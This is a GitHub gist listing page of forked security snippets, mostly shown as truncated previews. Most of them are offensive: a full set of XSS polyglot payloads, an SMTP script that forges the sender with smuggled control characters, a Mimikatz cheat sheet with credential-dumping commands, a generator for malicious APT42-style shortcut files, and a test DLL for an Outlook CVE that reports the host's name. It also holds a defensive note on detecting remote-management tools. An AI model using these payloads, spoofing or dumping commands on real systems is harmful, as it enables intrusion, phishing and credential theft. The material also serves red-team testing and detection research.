Skip to content

Instantly share code, notes, and snippets.

View emdnaia's full-sized avatar
👾

emdnaia

👾
57 followers · 394 following
View GitHub Profile
@emdnaia
emdnaia / RMM-detection.md
Created February 4, 2024 10:17 — forked from brokensound77/RMM-detection.md
Detection Engineering: RMM analysis

Detecting RMM

The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.

  • if the software is not used in the envrionment
    • could it be legitimate by a random empoyee?
    • is it an attacker BYOL
    • even so, all occurrences could probably be considered suspicious
  • if it is used in the environment
    • is every use of it legitimate? Probably not
  • this also creates significant living off the land (LOL) opportunity
@emdnaia
emdnaia / find-forks.py
Created March 9, 2024 01:39 — forked from akumria/find-forks.py
A quick way to find all the forks of a particular github project. see: https://github.com/akumria/findforks for a version which works now
#!/usr/bin/env python
import os
import urllib2
import json
import subprocess
user=None
repo=None
@emdnaia
emdnaia / altitude.py
Created March 9, 2024 01:49 — forked from HackingLZ/altitude.py
altitude alert
import csv
import requests
import argparse
from bs4 import BeautifulSoup
from colorama import Fore, Style, init
init(autoreset=True)
known_security_vendors = [
'symantec', 'mcafee', 'trendmicro', 'kaspersky', 'bitdefender',
@emdnaia
emdnaia / test_dll.c
Created April 12, 2024 12:03 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@emdnaia
emdnaia / nicecurl.py
Created May 2, 2024 23:28 — forked from HackingLZ/nicecurl.py
NICECURL Lnk Gen
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
import argparse
import random
import win32com.client
def insert_digit(word, digit):
pos = random.randint(1, len(word) - 1)
return word[:pos] + digit + word[pos:]
def generate_command(url, file_path):
@emdnaia
emdnaia / all_email_provider_domains.txt
Created June 3, 2024 21:04 — forked from ammarshah/all_email_provider_domains.txt
A list of all email provider domains (free, paid, blacklist etc). Some of these are probably not around anymore. I've combined a dozen lists from around the web. Current "major providers" should all be in here as of the date this is created.
0-mail.com
007addict.com
020.co.uk
027168.com
0815.ru
0815.su
0clickemail.com
0sg.net
0wnd.net
0wnd.org
@emdnaia
emdnaia / xss-polyglots.txt
Created August 18, 2024 06:36 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:`</template>\"///"//<
@emdnaia
emdnaia / function-mappings.csv
Created August 31, 2024 21:17 — forked from mez-0/function-mappings.csv
Common DLL's exports mapped to descriptions and categories via an LLM
We can't make this file beautiful and searchable because it's too large.
title description category
KERNEL32.DLL!TerminateJobObject This function terminates all processes associated with a job- managing processes and threads. Process and Thread Management
RPCRT4.DLL!NdrServerCall2 Facilitates remote procedure calls (RPC) but is not user-invoked. Network Operations
SHLWAPI.DLL!StrCSpnW Searches a string for specific characters- providing their index. Involves string manipulation rather than file or network processes. Memory Management
GDI32FULL.DLL!UpdateColors Updates the client area of a device context by remapping current colors to the logical palette. System Information and Control
RPCRT4.DLL!IUnknown_AddRef_Proxy Implements the AddRef method for interface proxies- managing reference counting in COM. Process and Thread Management
ADVAPI32.DLL!RegEnumKeyW Enumerates subkeys of an open registry key- indicating direct registry manipulation. Registry Operations
SECHOST.DLL!CredDeleteA Deletes a credential from the user's credential set- modifying stored authentication data.
@emdnaia
emdnaia / smtp.py
Created September 27, 2024 03:08 — forked from w1lsec/smtp.py
from socket import *
mail_server = ("tantotesting.mail.protection.outlook.com", 25)
client_socket = socket(AF_INET, SOCK_STREAM)
helo = "helo tantomail.com"
mail_from = "mail from: <[email protected]>"
rcpt_to = "rcpt to: <[email protected]>"
mail = """from: \x1f <,><[email protected]>\r
sender: "James Bond" <[email protected]>\r
@emdnaia
emdnaia / Mimikatz-cheatsheet
Created October 20, 2024 01:43 — forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full